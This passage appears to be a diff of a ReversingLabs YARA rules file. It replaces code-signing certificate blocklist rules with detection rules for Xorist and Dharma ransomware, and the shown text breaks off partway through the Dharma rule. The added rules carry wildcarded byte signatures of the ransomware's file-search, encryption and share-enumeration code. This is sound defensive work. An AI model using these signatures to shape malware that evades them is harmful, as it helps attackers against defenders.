-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and ( pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures [ i ] . serial == "d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" ) and 1601596800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Xorist ransomware."
 		author = "ReversingLabs"
-		id = "6f9852cb-277d-5942-b3f7-525593a41027"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "804ae039-fc3b-5f19-860e-df9efe87ee4d"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5386-L5402"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Xorist"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_and_encrypt_v1_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
+            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80
+        }
+		$search_and_encrypt_v1_p2 = {
+            3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF
+        }
+		$search_and_encrypt_v1_p3 = {
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9
+            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80
+            3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ??
+            ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ??
+            ?? ?? C9 C3
+        }
+		$extract_rsrc_v1 = {
+            55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1
+            E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ??
+            ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3
+            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
+            C9 C3
+        }
+		$search_and_encrypt_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
+            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C
+            ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68
+        }
+		$search_and_encrypt_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F
+            84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ??
+            ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2
+            D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$extract_rsrc_v2 = {
+            55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89
+            45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
+            ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83
+            E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03
+            FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ??
+            ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57
+            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
+            ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $extract_rsrc_v1 ) and ( all of ( $search_and_encrypt_v1_p* ) ) ) or ( ( $extract_rsrc_v2 ) and ( all of ( $search_and_encrypt_v2_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dharma ransomware."
 		author = "ReversingLabs"
-		id = "e1dd9783-078f-582e-8493-7c493cda9c62"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8157b20b-717c-581f-83c1-5fc8d2312238"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5404-L5422"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dharma"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_search = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55
+            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
+            75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
+            ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
+            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$file_encrypt_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ??
+            ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D
+            ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D
+            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D
+            ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ??
+            ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51
+        }
+		$file_encrypt_2 = {
+            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ??
+            74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ??
+            ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89
+            45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ??
+            6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89
+            45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ??
+            ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0
+            ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ??
+            EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ??
+            ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_shares = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ??
+            50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45
+            ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75
+            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ??
+            8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ??
+            8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1
+            ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
